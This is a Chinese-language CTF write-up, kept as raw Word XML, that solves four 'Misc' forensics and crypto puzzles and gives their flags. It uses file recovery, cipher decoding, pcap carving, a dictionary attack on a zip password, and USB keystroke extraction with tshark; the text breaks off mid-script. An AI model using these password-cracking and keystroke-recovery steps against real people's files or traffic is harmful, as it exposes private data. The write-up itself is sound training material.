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3EC3B" w14:textId="7CFE8F53" w:rsidR="00CA103F" w:rsidRDefault="006E76C1">
      <w:r>
        <w:t>Misc</w:t>
      </w:r>
      <w:r w:rsidR="00C02295">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F1ADA" w14:textId="77777777" w:rsidR="00836D5C" w:rsidRDefault="00836D5C">
      <w:pPr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拿到以后我们直接用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file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命令读取一下文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2229681C" w14:textId="1B0F48F8" w:rsidR="006E76C1" w:rsidRDefault="006E76C1">
      <w:pPr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E76C1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file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E76C1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>task_file.img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C4560EC" w14:textId="3B4010C0" w:rsidR="006E76C1" w:rsidRDefault="006E76C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6085A945" wp14:editId="551C56F0">
            <wp:extent cx="5274310" cy="415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9BA" w14:textId="7E776357" w:rsidR="00E7018B" w:rsidRDefault="00E7018B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以看到只接收到了ext4的数据包，很明显数据丢失了，我们使用kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux自带的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>extundelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去恢复数据文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF6E3E" w14:textId="2D135ACA" w:rsidR="006E76C1" w:rsidRDefault="006E76C1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E76C1">
        <w:t>extundelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E76C1">
        <w:t xml:space="preserve"> --restore-all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E76C1">
        <w:t>task_file.img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72CA737B" w14:textId="23C0605C" w:rsidR="006E76C1" w:rsidRDefault="006E76C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E6D0489" wp14:editId="1753F5C1">
            <wp:extent cx="4473328" cy="110499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654B" w14:textId="452AECBA" w:rsidR="006E76C1" w:rsidRDefault="006E76C1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成了一个</w:t>
      </w:r>
      <w:r w:rsidR="00C02295">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC8799C" w14:textId="1D9E0643" w:rsidR="00E7018B" w:rsidRDefault="00E7018B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我们去</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02295">
        <w:t>RECOVERED_FILES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹下查看文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E45C9" w14:textId="77777777" w:rsidR="00C02295" w:rsidRDefault="00C02295">
      <w:r w:rsidRPr="00C02295">
        <w:t>cd RECOVERED_FILES/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A697D" w14:textId="3020CC67" w:rsidR="00C02295" w:rsidRDefault="00C02295">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>s -al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E463A34" w14:textId="56D81CF7" w:rsidR="00C02295" w:rsidRDefault="00C02295">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27C573EC" wp14:editId="5CFCFE0C">
            <wp:extent cx="3917019" cy="98306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489B" w14:textId="61AFE98B" w:rsidR="00E7018B" w:rsidRDefault="00E7018B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以看到里面有个.</w:t>
      </w:r>
      <w:r>
        <w:t>cat.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，我们查看一下这个文件得出flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDC0DC4" w14:textId="5262FAE0" w:rsidR="00C02295" w:rsidRDefault="00C02295">
      <w:r>
        <w:t>cat ./cat.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47025A79" w14:textId="4CCD6142" w:rsidR="00C02295" w:rsidRDefault="00C02295">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60FA9F86" wp14:editId="09C6BD49">
            <wp:extent cx="3215919" cy="297206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EF6C" w14:textId="410460A4" w:rsidR="00C02295" w:rsidRPr="00946A6A" w:rsidRDefault="006267FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lag：</w:t>
      </w:r>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>flag{fugly_cats_need_luv_2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C8B20" w14:textId="541BDB36" w:rsidR="00C02295" w:rsidRDefault="00C02295">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>isc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB57B10" w14:textId="22251340" w:rsidR="00946A6A" w:rsidRDefault="00946A6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我们拿到文件以后一看，是道base64的解码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C83CA3C" w14:textId="46CD860C" w:rsidR="00C02295" w:rsidRDefault="00C02295">
      <w:r w:rsidRPr="00C02295">
        <w:t>a2FuYmJyZ2doamx7emJfX19ffXZ0bGFsbg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E36240" w14:textId="3EC5FEFE" w:rsidR="00C02295" w:rsidRDefault="00946A6A" w:rsidP="00C02295">
      <w:pPr>
        <w:pStyle w:val="a3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我们进行</w:t>
      </w:r>
      <w:r w:rsidR="00C02295"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base64解码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9F977D" w14:textId="32A66025" w:rsidR="00C02295" w:rsidRPr="00C02295" w:rsidRDefault="00C02295" w:rsidP="00C02295">
      <w:pPr>
        <w:pStyle w:val="a3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kanbbrgghjl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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zb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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___</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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_}</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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vtlaln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="163CE64D" w14:textId="2B83CD9F" w:rsidR="00C02295" w:rsidRDefault="00946A6A" w:rsidP="00C02295">
      <w:pPr>
        <w:pStyle w:val="p1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然后根据Hint，我们需要</w:t>
      </w:r>
      <w:r w:rsidR="00C02295"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进行栅栏密码加密</w:t>
      </w:r>
      <w:r w:rsidR="00C0229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，我们试出来了，key=7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664E20EE" w14:textId="053C8343" w:rsidR="00C02295" w:rsidRPr="00C02295" w:rsidRDefault="00C02295" w:rsidP="00C02295">
      <w:pPr>
        <w:pStyle w:val="p1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kzna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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blnl_abj_lbh_trg_vg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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14:paraId="395BE287" w14:textId="19B0AD2A" w:rsidR="00C02295" w:rsidRPr="00C02295" w:rsidRDefault="00946A6A" w:rsidP="00C02295">
      <w:pPr>
        <w:pStyle w:val="p1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然后我们</w:t>
      </w:r>
      <w:r w:rsidR="00C02295"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proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C02295"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凯</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C02295"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撒密码进行解密</w:t>
      </w:r>
      <w:r w:rsidR="00C0229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C02295" w:rsidRPr="00C02295">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>http://www.nicetool.net/app/caesar_decrypt.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D89D76C" w14:textId="357B0EC5" w:rsidR="00C02295" w:rsidRDefault="00C02295">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF26BF7" wp14:editId="5D59001C">
            <wp:extent cx="5274310" cy="2943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1022" w14:textId="4249467C" w:rsidR="00C02295" w:rsidRDefault="00C02295"/>
    <w:p w14:paraId="71F1B872" w14:textId="20E58BBB" w:rsidR="00946A6A" w:rsidRDefault="00946A6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功的看到了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字样，即为flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1021D53F" w14:textId="29EFF508" w:rsidR="00C02295" w:rsidRPr="00946A6A" w:rsidRDefault="006267FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00C02295">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>oyay_now_you_get_it</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3635F1" w14:textId="5CDA50A4" w:rsidR="006267FA" w:rsidRDefault="006267FA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>isc3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54874F" w14:textId="73CE1497" w:rsidR="00F82117" w:rsidRDefault="00F82117">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我们拿到流量包，排了个序，追踪一下TCP流，发现有</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个如下</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据包，提示了说flag就是这段字符串，我们一看就知道这是串base64解码，然后你发现base64无法解码，你只需要在后面补上3个=即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579174F" w14:textId="58C6DABB" w:rsidR="00032751" w:rsidRDefault="00032751">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FC22627" wp14:editId="19904FB7">
            <wp:extent cx="5274310" cy="4248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2193" w14:textId="13891A2F" w:rsidR="00032751" w:rsidRDefault="00F82117">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>然后我们base64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>decode一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E21CE97" w14:textId="49865A1C" w:rsidR="00032751" w:rsidRDefault="00032751">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E549F7D" wp14:editId="633D80E2">
            <wp:extent cx="5274310" cy="2778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AF40" w14:textId="371BC3B2" w:rsidR="00032751" w:rsidRDefault="00F82117">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后保存文件，放在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>binwalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下这个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D9537" w14:textId="0CE40978" w:rsidR="00032751" w:rsidRDefault="00032751">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234C0561" wp14:editId="36EC25A2">
            <wp:extent cx="5274310" cy="28930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311D" w14:textId="4B3AF88A" w:rsidR="006267FA" w:rsidRDefault="00952CF6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="305DA585" wp14:editId="063F594B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FD6B" w14:textId="739493FF" w:rsidR="00032751" w:rsidRDefault="00F82117">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以看到里面有个flag</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，我们直接把文件进行分离，用foremost分离</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2540D5D0" w14:textId="5F1484E9" w:rsidR="00032751" w:rsidRDefault="00032751">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70076AB2" wp14:editId="679520B4">
            <wp:extent cx="3025402" cy="609653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D196" w14:textId="029FD113" w:rsidR="00032751" w:rsidRDefault="00F82117">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我们file一下看看文件内容，里面有个压缩包，我们会发现这个压缩包</w:t>
      </w:r>
      <w:r w:rsidR="00836D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D3D54" w14:textId="751B4002" w:rsidR="00032751" w:rsidRDefault="00032751">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38F1BE4B" wp14:editId="2D1E0E67">
            <wp:extent cx="3932261" cy="32006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8E94" w14:textId="64650126" w:rsidR="00032751" w:rsidRDefault="00F82117">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这时候我们直接用kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux自带的字典去进行爆破，很快，不用半分钟就爆出来了密码，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7802CCA6" w14:textId="39B3561B" w:rsidR="00032751" w:rsidRDefault="00032751">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B3B4A98" wp14:editId="206FBDF9">
            <wp:extent cx="5274310" cy="675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1CE8" w14:textId="3798C9B6" w:rsidR="00946A6A" w:rsidRDefault="00946A6A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我们解开</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩包即可</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B7F27F3" w14:textId="47CE8BFF" w:rsidR="00946A6A" w:rsidRPr="00946A6A" w:rsidRDefault="00946A6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lag：</w:t>
      </w:r>
      <w:r w:rsidRPr="00946A6A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>flag{b31Ng_4_P1r4tE_1s_4lR1GHT_w1Th_M3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB5F67F" w14:textId="7787DEFE" w:rsidR="006267FA" w:rsidRDefault="006267FA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>isc4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3282AACA" w14:textId="68AA2A85" w:rsidR="00F82117" w:rsidRDefault="00F82117">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我们查看流量包，我们可以看到这是道和USB相关的流量包，我们</w:t>
      </w:r>
      <w:r w:rsidR="00836D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00836D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00836D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令提取文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632E2D85" w14:textId="7090A763" w:rsidR="00836D5C" w:rsidRDefault="00836D5C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00836D5C">
        <w:t>tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00836D5C">
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00836D5C">
        <w:t>task_AutoKey.pcapng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00836D5C">
        <w:t xml:space="preserve"> -T fields -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00836D5C">
        <w:t>usb.capdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00836D5C">
        <w:t xml:space="preserve"> &gt; data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787281C3" w14:textId="7645E288" w:rsidR="00836D5C" w:rsidRDefault="00836D5C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我们提取出了一串</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分好组的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00517F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00517F01">
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidR="00517F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，我们进行转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D40F5AD" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usb_codes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001DC0F3" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    0x04:"aA", 0x05:"bB", 0x06:"cC", 0x07:"dD", 0x08:"eE", 0x09:"fF",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107FC840" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    0x0A:"gG", 0x0B:"hH", 0x0C:"iI", 0x0D:"jJ", 0x0E:"kK", 0x0F:"lL",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11320BE8" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    0x10:"mM", 0x11:"nN", 0x12:"oO", 0x13:"pP", 0x14:"qQ", 0x15:"rR",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF7E28" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    0x16:"sS", 0x17:"tT", 0x18:"uU", 0x19:"vV", 0x1A:"wW", 0x1B:"xX",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F979D61" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    0x1C:"yY", 0x1D:"zZ", 0x1E:"1!", 0x1F:"2@", 0x20:"3#", 0x21:"4$",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D5DEA" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    0x22:"5%", 0x23:"6^", 0x24:"7&amp;", 0x25:"8*", 0x26:"9(", 0x27:"0)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7288C561" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    0x2C:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>"  "</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, 0x2D:"-_", 0x2E:"=+", 0x2F:"[{", 0x30:"]}",  0x32:"#~",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0408FF3F" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>33:";:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>", 0x34:"'\"",  0x36:",&lt;",  0x37:".&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6834C1AA" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF69649" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01"/>
    <w:p w14:paraId="70F04E33" w14:textId="77777777" w:rsidR="00517F01" w:rsidRDefault="00517F01" w:rsidP="00517F01">
      <w:r>
